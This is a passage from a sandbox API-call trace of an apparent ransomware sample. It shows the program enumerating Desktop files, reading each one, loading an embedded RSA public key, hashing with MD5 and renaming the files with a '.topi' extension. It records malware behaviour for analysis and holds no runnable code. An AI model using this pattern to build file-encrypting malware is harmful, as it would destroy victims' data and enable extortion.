nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.852] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.852] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.852] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.852] CloseHandle (hObject=0x6a8) returned 1 [0095.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0095.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0095.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.854] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\HKxIojb2dDJ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hkxiojb2ddj.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\HKxIojb2dDJ.ods.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hkxiojb2ddj.ods.topi")) returned 1 [0095.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.855] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.856] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07f10, ftCreationTime.dwHighDateTime=0x1d5c0a2, ftLastAccessTime.dwLowDateTime=0x775ab840, ftLastAccessTime.dwHighDateTime=0x1d5b792, ftLastWriteTime.dwLowDateTime=0x775ab840, ftLastWriteTime.dwHighDateTime=0x1d5b792, nFileSizeHigh=0x0, nFileSizeLow=0x6ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hrfBUXVd6.jpg", cAlternateFileName="HRFBUX~1.JPG")) returned 1 [0095.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.856] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\hrfBUXVd6.jpg") returned=".jpg" [0095.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\hrfBUXVd6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hrfbuxvd6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.857] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1722) returned 1 [0095.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.860] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x694, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.860] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.861] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.861] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6ba, lpOverlapped=0x0) returned 1 [0095.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.861] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.862] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.862] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.862] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.862] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.862] GetLastError () returned 0x0 [0095.863] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.863] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.863] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.863] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.863] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6c0) returned 0x31818b0 [0095.863] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2220 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2268 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.863] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96d8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d96c0 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.864] GetCurrentThreadId () returned 0x8c4 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6e80 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.865] GetCurrentThreadId () returned 0x8c4 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.866] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.866] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.866] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\hrfBUXVd6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hrfbuxvd6.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\hrfBUXVd6.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hrfbuxvd6.jpg.topi")) returned 1 [0095.867] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.867] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.867] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.868] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.868] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9395940, ftCreationTime.dwHighDateTime=0x1d5be42, ftLastAccessTime.dwLowDateTime=0x56ea49e0, ftLastAccessTime.dwHighDateTime=0x1d5bfad, ftLastWriteTime.dwLowDateTime=0x56ea49e0, ftLastWriteTime.dwHighDateTime=0x1d5bfad, nFileSizeHigh=0x0, nFileSizeLow=0xdbb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6NTjGWPf7Bn-3C.gif", cAlternateFileName="J6NTJG~1.GIF")) returned 1 [0095.868] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\J6NTjGWPf7Bn-3C.gif") returned=".gif" [0095.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\J6NTjGWPf7Bn-3C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\j6ntjgwpf7bn-3c.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.868] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=56248) returned 1 [0095.868] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.871] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdb92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.871] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.872] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.873] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.873] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.873] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.873] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.873] GetLastError () returned 0x0 [0095.873] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.873] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.873] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.873] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.873] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xdbc0) returned 0x9a06a00 [0095.874] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2268 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f22b0 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.874] 